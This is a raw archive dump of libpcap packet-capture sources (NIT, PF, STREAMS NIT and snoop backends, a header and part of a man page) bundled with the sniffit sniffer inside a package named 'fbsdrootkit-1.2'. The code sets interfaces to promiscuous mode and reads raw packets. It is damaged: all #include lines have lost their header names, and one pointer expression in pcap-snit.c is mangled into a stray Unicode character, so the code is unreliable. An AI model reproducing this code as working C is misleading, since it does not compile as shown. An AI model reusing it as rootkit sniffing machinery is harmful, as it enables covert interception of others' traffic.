interface we're gonna use */ if (ioctl(p->fd, SIOCGIFFLAGS, &ifr) < 0 ) { /* get flags */ sprintf(ebuf, "socket ioctl get: %s", pcap_strerror(errno)); goto bad; } ifr_orig = ifr; atexit(restore_interface); ifr.ifr_flags |= IFF_PROMISC; /* set promiscuous mode */ if (ioctl(p->fd, SIOCSIFFLAGS, &ifr) < 0 ) { /* set flags */ sprintf(ebuf, "socket ioctl set: %s", pcap_strerror(errno)); goto bad; } } strcpy(snoop_device,device); p->snapshot = snaplen; return (p); bad: if (p->fd >= 0) close(p->fd); if (p->buffer != NULL) free(p->buffer); free(p); return (0); } int pcap_setfilter(pcap_t *p, struct bpf_program *fp) { p->fcode = *fp; return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-namedb.h100400 764 764 6060 6226213211 17162 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap-namedb.h,v 1.2 94/06/14 20:03:34 leres Exp $ (LBL) */ #ifndef lib_pcap_ethers_h #define lib_pcap_ethers_h /* * As returned by the pcap_next_etherent() * XXX this stuff doesn't belong in this inteface, but this * library already must do name to address translation, so * on systems that don't have support for /etc/ethers, we * export these hooks since they'll */ struct pcap_etherent { u_char addr[6]; char name[122]; }; #ifndef PCAP_ETHERS_FILE #define PCAP_ETHERS_FILE "/etc/ethers" #endif struct pcap_etherent *pcap_next_etherent(FILE *); u_char *pcap_ether_hostton(const char*); u_char *pcap_ether_aton(const char *); u_long **pcap_nametoaddr(const char *); u_long pcap_nametonetaddr(const char *); int pcap_nametoport(const char *, int *, int *); int pcap_nametoproto(const char *); int pcap_nametoeproto(const char *); /* * If a protocol is unknown, PROTO_UNDEF is returned. * Also, pcap_nametoport() returns the protocol along with the port number. * If there are ambiguous entried in /etc/services (i.e. domain * can be either tcp or udp) PROTO_UNDEF is returned. */ #define PROTO_UNDEF -1 /* XXX move these to pcap-int.h? */ u_long __pcap_atodn(const char *); u_long __pcap_atoin(const char *); u_short __pcap_nametodnaddr(const char *); #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-nit.c100400 764 764 12715 6226213211 16545 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-nit.c,v 1.24 94/02/10 23:02:37 leres Exp $ (LBL)"; #endif #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" /* * The chunk size for NIT. This is the amount of buffering * done for read calls. */ #define CHUNKSIZE (2*1024) /* * The total buffer space used by NIT. */ #define BUFSPACE (4*CHUNKSIZE) /* Forwards */ static int nit_setflags(int, int, int, char *); int pcap_stats(pcap_t *p, struct pcap_stat *ps) { *ps = p->md.stat; return (0); } int pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { register int cc, n; register struct bpf_insn *fcode = p->fcode.bf_insns; register u_char *bp, *cp, *ep; register struct nit_hdr *nh; register int caplen; cc = p->cc; if (cc == 0) { cc = read(p->fd, (char *)p->buffer, p->bufsize); if (cc < 0) { if (errno == EWOULDBLOCK) return (0); sprintf(p->errbuf, "pcap_read: %s", pcap_strerror(errno)); return (-1); } bp = p->buffer; } else bp = p->bp; /* * Loop through each packet. The increment expression * rounds up to the next int boundary past the end of * the previous packet. */ n = 0; ep = bp + cc; while (bp < ep) { nh = (struct nit_hdr *)bp; cp = bp + sizeof(*nh); switch (nh->nh_state) { case NIT_CATCH: break; case NIT_NOMBUF: case NIT_NOCLUSTER: case NIT_NOSPACE: p->md.stat.ps_drop = nh->nh_dropped; continue; case NIT_SEQNO: continue; default: sprintf(p->errbuf, "bad nit state %d", nh->nh_state); return (-1); } ++p->md.stat.ps_recv; bp += ((sizeof(struct nit_hdr) + nh->nh_datalen + sizeof(int) - 1) & ~(sizeof(int) - 1)); caplen = nh->nh_wirelen; if (caplen > p->snapshot) caplen = p->snapshot; if (bpf_filter(fcode, cp, nh->nh_wirelen, caplen)) { struct pcap_pkthdr h; h.ts = nh->nh_timestamp; h.len = nh->nh_wirelen; h.caplen = caplen; (*callback)(user, &h, cp); if (++n >= cnt && cnt >= 0) { p->cc = ep - bp; p->bp = bp; return (n); } } } p->cc = 0; return (n); } static int nit_setflags(int fd, int promisc, int to_ms, char *ebuf) { struct nit_ioc nioc; bzero((char *)&nioc, sizeof(nioc)); nioc.nioc_bufspace = BUFSPACE; nioc.nioc_chunksize = CHUNKSIZE; nioc.nioc_typetomatch = NT_ALLTYPES; nioc.nioc_snaplen = p->snapshot; nioc.nioc_bufalign = sizeof(int); nioc.nioc_bufoffset = 0; if (to_ms != 0) { nioc.nioc_flags |= NF_TIMEOUT; nioc.nioc_timeout.tv_sec = to_ms / 1000; nioc.nioc_timeout.tv_usec = (to_ms * 1000) % 1000000; } if (promisc) nioc.nioc_flags |= NF_PROMISC; if (ioctl(fd, SIOCSNIT, &nioc) < 0) { sprintf(ebuf, "SIOCSNIT: %s", pcap_strerror(errno)); return (-1); } return (0); } pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) { int fd; struct sockaddr_nit snit; register pcap_t *p; p = (pcap_t *)malloc(sizeof(*p)); if (p == NULL) { strcpy(ebuf, pcap_strerror(errno)); return (NULL); } if (snaplen < 96) /* * NIT requires a snapshot length of at least 96. */ snaplen = 96; bzero(p, sizeof(*p)); p->fd = fd = socket(AF_NIT, SOCK_RAW, NITPROTO_RAW); if (fd < 0) { sprintf(ebuf, "socket: %s", pcap_strerror(errno)); goto bad; } snit.snit_family = AF_NIT; (void)strncpy(snit.snit_ifname, device, NITIFSIZ); if (bind(fd, (struct sockaddr *)&snit, sizeof(snit))) { sprintf(ebuf, "bind: %s: %s", snit.snit_ifname, pcap_strerror(errno)); goto bad; } p->snapshot = snaplen; nit_setflags(p->fd, promisc, to_ms, ebuf); /* * NIT supports only ethernets. */ p->linktype = DLT_EN10MB; p->bufsize = BUFSPACE; p->buffer = (u_char *)malloc(p->bufsize); if (p->buffer == NULL) { strcpy(ebuf, pcap_strerror(errno)); goto bad; } return (p); bad: if (fd >= 0) close(fd); free(p); return (NULL); } int pcap_setfilter(pcap_t *p, struct bpf_program *fp) { p->fcode = *fp; return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-nit.h100400 764 764 1656 6226213211 16534 0ustar dfdf/* * Copyright (c) 1990, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Lawrence Berkeley Laboratory, * Berkeley, CA. The name of the University may not be used to * endorse or promote products derived from this software without * specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * @(#) $Header: pcap-nit.h,v 1.2 94/06/14 20:06:03 leres Exp $ (LBL) */ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-pf.c100400 764 764 17673 6226213211 16370 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-pf.c,v 1.32 94/06/10 17:41:01 mccanne Exp $ (LBL)"; #endif /* * packet filter subroutines for tcpdump * Extraction/creation by Jeffrey Mogul, DECWRL * * Extracted from tcpdump.c. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" /* * BUFSPACE is the size in bytes of the packet read buffer. Most tcpdump * applications aren't going to need more than 200 bytes of packet header * and the read shouldn't return more packets than packetfilter's internal * queue limit (bounded at 256). */ #define BUFSPACE (200*256) int pcap_read(pcap_t *pc, int cnt, pcap_handler callback, u_char *user) { u_char *p; struct bpf_insn *fcode; int cc; register u_char *bp; int buflen, inc; struct enstamp stamp; int n; fcode = pc->md.use_bpf ? 0 : pc->fcode.bf_insns; again: cc = pc->cc; if (cc == 0) { cc = read(pc->fd, (char *)pc->buffer, pc->bufsize); if (cc < 0) { if (errno == EWOULDBLOCK) return (0); if (errno == EINVAL && (long)(tell(pc->fd) + pc->bufsize) < 0) { /* * Due to a kernel bug, after 2^31 bytes, * the kernel file offset overflows and * read fails with EINVAL. The lseek() * to 0 will fix things. */ (void)lseek(pc->fd, 0L, 0); goto again; } sprintf(pc->errbuf, "pf read: %s", pcap_strerror(errno)); return (-1); } bp = pc->buffer; } else bp = pc->bp; /* * Loop through each packet. */ n = 0; while (cc > 0) { /* avoid alignment issues here */ bcopy((char *)bp, (char *)&stamp, sizeof(stamp)); if (stamp.ens_stamplen != sizeof(stamp)) /* buffer is garbage, treat it as poison */ break; p = bp + stamp.ens_stamplen; buflen = stamp.ens_count; if (buflen > pc->snapshot) buflen = pc->snapshot; /* * Short-circuit evaluation: if using BPF filter * in kernel, no need to do it now. */ if (fcode == 0 || bpf_filter(fcode, p, stamp.ens_count, buflen)) { struct pcap_pkthdr h; pc->md.TotAccepted++; h.ts = stamp.ens_tstamp; h.len = stamp.ens_count; h.caplen = buflen; (*callback)(user, &h, p); if (++n >= cnt && cnt > 0) { inc = ENALIGN(buflen + stamp.ens_stamplen); cc -= inc; bp += inc; pc->cc = cc; pc->bp = bp; return (n); } } pc->md.TotPkts++; pc->md.TotDrops += stamp.ens_dropped; pc->md.TotMissed = stamp.ens_ifoverflows; if (pc->md.OrigMissed < 0) pc->md.OrigMissed = pc->md.TotMissed; inc = ENALIGN(buflen + stamp.ens_stamplen); cc -= inc; bp += inc; } pc->cc = 0; return (n); } int pcap_stats(pcap_t *p, struct pcap_stat *ps) { ps->ps_recv = p->md.TotAccepted; ps->ps_drop = p->md.TotDrops; ps->ps_ifdrop = p->md.TotMissed - p->md.OrigMissed; return (0); } pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) { pcap_t *p; short enmode; int backlog = -1; /* request the most */ struct enfilter Filter; struct endevp devparams; p = (pcap_t *)malloc(sizeof(*p)); if (p == 0) { strcpy(ebuf, "no swap"); return (0); } bzero(p, sizeof(*p)); p->fd = pfopen(device, 0); if (p->fd < 0) { sprintf(ebuf, "pf open: %s: %s\n\ your system may not be properly configured; see \"man packetfilter(4)\"\n", device, pcap_strerror(errno)); goto bad; } p->md.OrigMissed = -1; enmode = ENTSTAMP|ENBATCH|ENNONEXCL; if (promisc) enmode |= ENPROMISC; if (ioctl(p->fd, EIOCMBIS, (caddr_t)&enmode) < 0) { sprintf(ebuf, "EIOCMBIS: %s", pcap_strerror(errno)); goto bad; } #ifdef ENCOPYALL /* Try to set COPYALL mode so that we see packets to ourself */ enmode = ENCOPYALL; (void)ioctl(p->fd, EIOCMBIS, (caddr_t)&enmode);/* OK if this fails */ #endif /* set the backlog */ if (ioctl(p->fd, EIOCSETW, (caddr_t)&backlog) < 0) { sprintf(ebuf, "EIOCSETW: %s", pcap_strerror(errno)); goto bad; } /* set truncation */ if (ioctl(p->fd, EIOCTRUNCATE, (caddr_t)&snaplen) < 0) { sprintf(ebuf, "EIOCTRUNCATE: %s", pcap_strerror(errno)); goto bad; } p->snapshot = snaplen; /* accept all packets */ Filter.enf_Priority = 37; /* anything > 2 */ Filter.enf_FilterLen = 0; /* means "always true" */ if (ioctl(p->fd, EIOCSETF, (caddr_t)&Filter) < 0) { sprintf(ebuf, "EIOCSETF: %s", pcap_strerror(errno)); goto bad; } /* discover interface type */ if (ioctl(p->fd, EIOCDEVP, (caddr_t)&devparams) < 0) { sprintf(ebuf, "EIOCDEVP: %s", pcap_strerror(errno)); goto bad; } /* HACK: to compile prior to Ultrix 4.2 */ #ifndef ENDT_FDDI #define ENDT_FDDI 4 #endif switch (devparams.end_dev_type) { case ENDT_10MB: p->linktype = DLT_EN10MB; break; case ENDT_FDDI: p->linktype = DLT_FDDI; break; default: /* * XXX * Currently, the Ultrix packet filter supports only * Ethernet and FDDI. Eventually, support for SLIP and PPP * (and possibly others: T1?) should be added. */ #ifdef notdef warning( "Packet filter data-link type %d unknown, assuming Ethernet", devparams.end_dev_type); #endif p->linktype = DLT_EN10MB; break; } if (to_ms != 0) { struct timeval timeout; timeout.tv_sec = to_ms / 1000; timeout.tv_usec = (to_ms * 1000) % 1000000; if (ioctl(p->fd, EIOCSRTIMEOUT, (caddr_t)&timeout) < 0) { sprintf(ebuf, "EIOCSRTIMEOUT: %s", pcap_strerror(errno)); goto bad; } } p->bufsize = BUFSPACE; p->buffer = (u_char*)malloc(p->bufsize); return (p); bad: free(p); return (0); } int pcap_setfilter(pcap_t *p, struct bpf_program *fp) { /* * See if BIOCSETF works. If it does, the kernel supports * BPF-style filters, and we do not need to do post-filtering. */ p->md.use_bpf = (ioctl(p->fd, BIOCSETF, (caddr_t)fp) >= 0); if (p->md.use_bpf) { struct bpf_version bv; if (ioctl(p->fd, BIOCVERSION, (caddr_t)&bv) < 0) { sprintf(p->errbuf, "BIOCVERSION: %s", pcap_strerror(errno)); return (-1); } else if (bv.bv_major != BPF_MAJOR_VERSION || bv.bv_minor < BPF_MINOR_VERSION) { fprintf(stderr, "requires bpf language %d.%d or higher; kernel is %d.%d", BPF_MAJOR_VERSION, BPF_MINOR_VERSION, bv.bv_major, bv.bv_minor); /* don't give up, just be inefficient */ p->md.use_bpf = 0; } } else p->fcode = *fp; /*XXX this goes in tcpdump*/ if (p->md.use_bpf) fprintf(stderr, "tcpdump: Using kernel BPF filter\n"); else fprintf(stderr, "tcpdump: Filtering in user process\n"); return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-pf.h100400 764 764 1655 6226213211 16346 0ustar dfdf/* * Copyright (c) 1990, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Lawrence Berkeley Laboratory, * Berkeley, CA. The name of the University may not be used to * endorse or promote products derived from this software without * specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * @(#) $Header: pcap-pf.h,v 1.2 94/06/14 20:06:33 leres Exp $ (LBL) */ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-snit.c100600 764 764 15712 6226213211 16732 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-snit.c,v 1.33+ 94/06/23 13:51:17 leres Exp $ (LBL)"; #endif /* * Modifications made to accomodate the new SunOS4.0 NIT facility by * Micky Liu, micky@cunixc.cc.columbia.edu, Columbia University in May, 1989. * This module now handles the STREAMS based NIT. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" /* * The chunk size for NIT. This is the amount of buffering * done for read calls. */ #define CHUNKSIZE (2*1024) /* * The total buffer space used by NIT. */ #define BUFSPACE (4*CHUNKSIZE) /* Forwards */ static int nit_setflags(int, int, int, char *); int pcap_stats(pcap_t *p, struct pcap_stat *ps) { *ps = p->md.stat; return (0); } int pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { register int cc, n; register struct bpf_insn *fcode = p->fcode.bf_insns; register u_char *bp, *cp, *ep; register struct nit_bufhdr *hdrp; register struct nit_iftime *ntp; register struct nit_iflen *nlp; register struct nit_ifdrops *ndp; register int caplen; cc = p->cc; if (cc == 0) { cc = read(p->fd, (char *)p->buffer, p->bufsize); if (cc < 0) { if (errno == EWOULDBLOCK) return (0); sprintf(p->errbuf, "pcap_read: %s", pcap_strerror(errno)); return (-1); } bp = p->buffer; } else bp = p->bp; /* * loop through each snapshot in the chunk */ n = 0; ep = bp + cc; while (bp < ep) { ++p->md.stat.ps_recv; cp = bp; /* get past NIT buffer */ hdrp = (struct nit_bufhdr *)cp; cp += sizeof(*hdrp); /* get past NIT timer */ ntp = (struct nit_iftime *)cp; cp += sizeof(*ntp); ndp = (struct nit_ifdrops *)cp; p->md.stat.ps_drop = ndp->nh_drops; cp += sizeof *ndp; /* get past packet len */ nlp = (struct nit_iflen *)cp; cp += sizeof(*nlp); /* next snapshot */ bp += hdrp->nhb_totlen; caplen = nlp->nh_pktlen; if (caplen > p->snapshot) caplen = p->snapshot; if (bpf_filter(fcode, cp, nlp->nh_pktlen, caplen)) { struct pcap_pkthdr h; h.ts = ntp->nh_timestamp; h.len = nlp->nh_pktlen; h.caplen = caplen; (*callback)(user, &h, cp); if (++n >= cnt && cnt >= 0) { p->cc = ep - bp; p->bp = bp; return (n); } } } p->cc = 0; return (n); } static int nit_setflags(int fd, int promisc, int to_ms, char *ebuf) { u_long flags; struct strioctl si; struct timeval timeout; si.ic_timout = INFTIM; if (to_ms != 0) { timeout.tv_sec = to_ms / 1000; timeout.tv_usec = (to_ms * 1000) % 1000000; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if (ioctl(fd, I_STR, (char *)&si) < 0) { sprintf(ebuf, "NIOCSTIME: %s", pcap_strerror(errno)); return (-1); } } flags = NI_TIMESTAMP | NI_LEN | NI_DROPS; if (promisc) flags |= NI_PROMISC; si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(flags); si.ic_dp = (char *)&flags; if (ioctl(fd, I_STR, (char *)&si) < 0) { sprintf(ebuf, "NIOCSFLAGS: %s", pcap_strerror(errno)); return (-1); } return (0); } pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) { struct strioctl si; /* struct for ioctl() */ struct ifreq ifr; /* interface request struct */ int chunksize = CHUNKSIZE; int fd; static char dev[] = "/dev/nit"; register pcap_t *p; p = (pcap_t *)malloc(sizeof(*p)); if (p == NULL) { strcpy(ebuf, pcap_strerror(errno)); return (NULL); } if (snaplen < 96) /* * NIT requires a snapshot length of at least 96. */ snaplen = 96; bzero(p, sizeof(*p)); p->fd = fd = open(dev, O_RDONLY); if (fd < 0) { sprintf(ebuf, "%s: %s", dev, pcap_strerror(errno)); goto bad; } /* arrange to get discrete messages from the STREAM and use NIT_BUF */ if (ioctl(fd, I_SRDOPT, (char *)RMSGD) < 0) { sprintf(ebuf, "I_SRDOPT: %s", pcap_strerror(errno)); goto bad; } if (ioctl(fd, I_PUSH, "nbuf") < 0) { sprintf(ebuf, "push nbuf: %s", pcap_strerror(errno)); goto bad; } /* set the chunksize */ si.ic_cmd = NIOCSCHUNK; si.ic_timout = INFTIM; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if (ioctl(fd, I_STR, (char *)&si) < 0) { sprintf(ebuf, "NIOCSCHUNK: %s", pcap_strerror(errno)); goto bad; } /* request the interface */ strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = ' '; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if (ioctl(fd, I_STR, (char *)&si) < 0) { sprintf(ebuf, "NIOCBIND: %s: %s", ifr.ifr_name, pcap_strerror(errno)); goto bad; } /* set the snapshot length */ si.ic_cmd = NIOCSSNAP; si.ic_len = sizeof(snaplen); si.ic_dp = (char *)&snaplen; if (ioctl(fd, I_STR, (char *)&si) < 0) { sprintf(ebuf, "NIOCSSNAP: %s", pcap_strerror(errno)); goto bad; } p->snapshot = snaplen; if (nit_setflags(p->fd, promisc, to_ms, ebuf) < 0) goto bad; (void)ioctl(fd, I_FLUSH, (char *)FLUSHR); /* * NIT supports only ethernets. */ p->linktype = DLT_EN10MB; p->bufsize = BUFSPACE; p->buffer = (u_char *)malloc(p->bufsize); if (p->buffer == NULL) { strcpy(ebuf, pcap_strerror(errno)); goto bad; } return (p); bad: if (fd >= 0) close(fd); free(p); return (NULL); } int pcap_setfilter(pcap_t *p, struct bpf_program *fp) { p->fcode = *fp; return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-snoop.c100400 764 764 12060 6226213211 17102 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-snoop.c,v 1.6 94/01/31 05:26:09 leres Exp $ (LBL)"; #endif #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" static int hdrpad; /* XXX */ int pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { int cc; register struct snoopheader *sh; register int datalen; register int caplen; register u_char *cp; again: cc = read(p->fd, (char *)p->buffer, p->bufsize); if (cc < 0) { switch (errno) { case EWOULDBLOCK: return (0); /* XXX */ } sprintf(p->errbuf, "read: %s", pcap_strerror(errno)); return (-1); } sh = (struct snoopheader *)p->buffer; datalen = sh->snoop_packetlen; caplen = (datalen < p->snapshot) ? datalen : p->snapshot; cp = (u_char *)(sh + 1) + hdrpad; /* XXX */ if (p->fcode.bf_insns == NULL || bpf_filter(p->fcode.bf_insns, cp, datalen, caplen)) { struct pcap_pkthdr h; ++p->md.stat.ps_recv; h.ts = sh->snoop_timestamp; h.len = datalen; h.caplen = caplen; (*callback)(user, &h, cp); return (1); } return (0); } int pcap_stats(pcap_t *p, struct pcap_stat *ps) { register struct rawstats *rs; struct rawstats rawstats; rs = &rawstats; bzero((char *)rs, sizeof(*rs)); if (ioctl(p->fd, SIOCRAWSTATS, (char *)rs) < 0) { sprintf(p->errbuf, "SIOCRAWSTATS: %s", pcap_strerror(errno)); return (-1); } p->md.stat.ps_drop = rs->rs_snoop.ss_ifdrops + rs->rs_snoop.ss_sbdrops + rs->rs_drain.ds_ifdrops + rs->rs_drain.ds_sbdrops; *ps = p->md.stat; return (0); } /* XXX can't disable promiscuous */ pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) { pcap_t *p; struct sockaddr_raw sr; int fd; int v; struct snoopfilter sf; p = (pcap_t *)malloc(sizeof(*p)); if (p == NULL) { strcpy(ebuf, "no swap"); return (0); } bzero(p, sizeof(*p)); p->fd = -1; p->bufsize = 4096; /* XXX */ p->buffer = (u_char *)malloc(p->bufsize); if (p->buffer == NULL) { strcpy(ebuf, "no swap"); goto bad; } fd = p->fd = socket(PF_RAW, SOCK_RAW, RAWPROTO_SNOOP); if (fd < 0) { sprintf(ebuf, "snoop socket: %s", pcap_strerror(errno)); goto bad; } sr.sr_family = AF_RAW; sr.sr_port = 0; (void)strncpy(sr.sr_ifname, device, sizeof(sr.sr_ifname)); if (bind(fd, (struct sockaddr *)&sr, sizeof(sr))) { sprintf(ebuf, "snoop bind: %s", pcap_strerror(errno)); goto bad; } bzero((char *)&sf, sizeof(sf)); if (ioctl(fd, SIOCADDSNOOP, &sf) < 0) { sprintf(ebuf, "SIOCADDSNOOP: %s", pcap_strerror(errno)); goto bad; } v = 64 * 1024; (void)setsockopt(fd, SOL_SOCKET, SO_RCVBUF, (char *)&v, sizeof(v)); if (ioctl(fd, SIOCSNOOPLEN, &snaplen) < 0) { sprintf(ebuf, "SIOCSNOOPLEN: %s", pcap_strerror(errno)); goto bad; } p->snapshot = snaplen; v = 1; if (ioctl(fd, SIOCSNOOPING, &v) < 0) { sprintf(ebuf, "SIOCSNOOPING: %s", pcap_strerror(errno)); goto bad; } /* * XXX hack - map device name to link later type */ if (strncmp("et", device, 2) == 0 || strncmp("ec", device, 2) == 0) { p->linktype = DLT_EN10MB; hdrpad = RAW_HDRPAD(sizeof(struct ether_header)); } else if (strncmp("ipg", device, 3) == 0 || strncmp("xpi", device, 3) == 0) { p->linktype = DLT_FDDI; hdrpad = 3; /* XXX yeah? */ } else { sprintf(ebuf, "snoop: unknown physical layer type"); goto bad; } return (p); bad: if (fd >= 0) close(fd); if (p->buffer != NULL) free(p->buffer); free(p); return (0); } int pcap_setfilter(pcap_t *p, struct bpf_program *fp) { p->fcode = *fp; return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap.3100400 764 764 17214 6226213211 15674 0ustar dfdf.\" Copyright (c) 1994 .\" The Regents of the University of California. All rights reserved. .\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that: (1) source code distributions .\" retain the above copyright notice and this paragraph in its entirety, (2) .\" distributions including binary code include the above copyright notice and .\" this paragraph in its entirety in the documentation or other materials .\" provided with the distribution, and (3) all advertising materials mentioning .\" features or use of this software display the following acknowledgement: .\" ``This product includes software developed by the University of California, .\" Lawrence Berkeley Laboratory and its contributors.'' Neither the name of .\" the University nor the names of its contributors may be used to endorse .\" or promote products derived from this software without specific prior .\" written permission. .\" THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED .\" WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF .\" MERCHANTABILITY AND 